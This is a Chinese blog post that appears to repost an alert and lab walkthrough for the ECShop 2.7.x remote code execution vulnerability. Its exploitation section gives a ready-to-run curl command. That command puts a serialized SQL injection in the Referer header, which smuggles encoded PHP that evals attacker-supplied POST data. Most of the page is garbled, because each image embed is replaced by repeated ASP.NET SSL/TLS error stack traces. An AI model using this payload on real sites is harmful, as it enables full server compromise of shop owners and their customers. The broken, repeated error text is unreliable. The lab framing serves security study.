漏洞预警

  • 内容
  • 相关
et_highlighter51

2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。 —— ECShop全系列版本远程代码执行高危漏洞分析

漏洞分析:

  • 预警| ECShop全系列版本远程代码执行高危漏洞 阿里云WAF已可防御
  • ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用

 

在线实验地址:

打开 VULNSPY ECSHOP 实验环境

 

漏洞利用

1. 点击右上方 START TO HACK 按钮创建 ECShop实验环境

请求被中止: 未能创建 SSL/TLS 安全通道。

“/”应用程序中的服务器错误。

请求被中止: 未能创建 SSL/TLS 安全通道。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。

源错误:

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

堆栈跟踪:


[WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。]
   System.Net.HttpWebRequest.GetResponse() +6558436
   Img_Save.SaveImg.Page_Load(Object sender, EventArgs e) +187
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +51
   System.Web.UI.Control.OnLoad(EventArgs e) +92
   System.Web.UI.Control.LoadRecursive() +54
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +772


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400
" rel="external nofollow" class="highslide-img" target="_blank" style="box-sizing:border-box;color:#1DADA7;text-decoration-line:none;">vulnspy

“/”应用程序中的服务器错误。

请求被中止: 未能创建 SSL/TLS 安全通道。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。

源错误:

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

堆栈跟踪:


[WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。]
   System.Net.HttpWebRequest.GetResponse() +6558436
   Img_Save.SaveImg.Page_Load(Object sender, EventArgs e) +187
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +51
   System.Web.UI.Control.OnLoad(EventArgs e) +92
   System.Web.UI.Control.LoadRecursive() +54
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +772


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400
" src="http://imgs.0xmg.com 请求被中止: 未能创建 SSL/TLS 安全通道。

“/”应用程序中的服务器错误。

请求被中止: 未能创建 SSL/TLS 安全通道。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。

源错误:

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

堆栈跟踪:


[WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。]
   System.Net.HttpWebRequest.GetResponse() +6558436
   Img_Save.SaveImg.Page_Load(Object sender, EventArgs e) +187
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +51
   System.Web.UI.Control.OnLoad(EventArgs e) +92
   System.Web.UI.Control.LoadRecursive() +54
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +772


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400
" rel="external nofollow" style="box-sizing:border-box;vertical-align:middle;border-style:none;max-width:100%;display:block;margin:12px auto;height:auto !important;" />

2. 创建完成后打开 ECSHOP 实验地址

请求被中止: 未能创建 SSL/TLS 安全通道。

“/”应用程序中的服务器错误。

请求被中止: 未能创建 SSL/TLS 安全通道。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。

源错误:

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

堆栈跟踪:


[WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。]
   System.Net.HttpWebRequest.GetResponse() +6558436
   Img_Save.SaveImg.Page_Load(Object sender, EventArgs e) +187
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +51
   System.Web.UI.Control.OnLoad(EventArgs e) +92
   System.Web.UI.Control.LoadRecursive() +54
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +772


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400
" rel="external nofollow" class="highslide-img" target="_blank" style="box-sizing:border-box;color:#1DADA7;text-decoration-line:none;">vulnspy

“/”应用程序中的服务器错误。

请求被中止: 未能创建 SSL/TLS 安全通道。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。

源错误:

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

堆栈跟踪:


[WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。]
   System.Net.HttpWebRequest.GetResponse() +6558436
   Img_Save.SaveImg.Page_Load(Object sender, EventArgs e) +187
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +51
   System.Web.UI.Control.OnLoad(EventArgs e) +92
   System.Web.UI.Control.LoadRecursive() +54
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +772


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400
" src="http://imgs.0xmg.com 请求被中止: 未能创建 SSL/TLS 安全通道。

“/”应用程序中的服务器错误。

请求被中止: 未能创建 SSL/TLS 安全通道。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。

源错误:

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

堆栈跟踪:


[WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。]
   System.Net.HttpWebRequest.GetResponse() +6558436
   Img_Save.SaveImg.Page_Load(Object sender, EventArgs e) +187
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +51
   System.Web.UI.Control.OnLoad(EventArgs e) +92
   System.Web.UI.Control.LoadRecursive() +54
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +772


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400
" rel="external nofollow" style="box-sizing:border-box;vertical-align:middle;border-style:none;max-width:100%;display:block;margin:12px auto;height:auto !important;" />

3. 发送 Payload 执行 phpinfo();

将**.vsplate.me换成您的实验地址*

在终端中执行:

curl http://***.vsplate.me/user.php -d "action=login&vulnspy=phpinfo();exit;" -H "Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:""""""/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca"

请求被中止: 未能创建 SSL/TLS 安全通道。

“/”应用程序中的服务器错误。

请求被中止: 未能创建 SSL/TLS 安全通道。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。

源错误:

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

堆栈跟踪:


[WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。]
   System.Net.HttpWebRequest.GetResponse() +6558436
   Img_Save.SaveImg.Page_Load(Object sender, EventArgs e) +187
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +51
   System.Web.UI.Control.OnLoad(EventArgs e) +92
   System.Web.UI.Control.LoadRecursive() +54
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +772


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400
" rel="external nofollow" class="highslide-img" target="_blank" style="box-sizing:border-box;color:#1DADA7;text-decoration-line:none;">vulnspy

“/”应用程序中的服务器错误。

请求被中止: 未能创建 SSL/TLS 安全通道。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。

源错误:

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

堆栈跟踪:


[WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。]
   System.Net.HttpWebRequest.GetResponse() +6558436
   Img_Save.SaveImg.Page_Load(Object sender, EventArgs e) +187
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +51
   System.Web.UI.Control.OnLoad(EventArgs e) +92
   System.Web.UI.Control.LoadRecursive() +54
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +772


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400
" src="http://imgs.0xmg.com 请求被中止: 未能创建 SSL/TLS 安全通道。

“/”应用程序中的服务器错误。

请求被中止: 未能创建 SSL/TLS 安全通道。

说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Net.WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。

源错误:

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

堆栈跟踪:


[WebException: 请求被中止: 未能创建 SSL/TLS 安全通道。]
   System.Net.HttpWebRequest.GetResponse() +6558436
   Img_Save.SaveImg.Page_Load(Object sender, EventArgs e) +187
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +51
   System.Web.UI.Control.OnLoad(EventArgs e) +92
   System.Web.UI.Control.LoadRecursive() +54
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +772


版本信息: Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400
" rel="external nofollow" style="box-sizing:border-box;vertical-align:middle;border-style:none;max-width:100%;display:block;margin:12px auto;height:auto !important;" />

 

参考

  • 预警| ECShop全系列版本远程代码执行高危漏洞 阿里云WAF已可防御
  • ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用

  • 打赏支付宝扫一扫
  • 打赏微信扫一扫
  • 打赏企鹅扫一扫

本文标签:

版权声明:若无特殊注明,本文皆为《Mushroom》原创,转载请保留文章出处。

本文链接:漏洞预警 - http://www.0xmg.com/post-1529.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注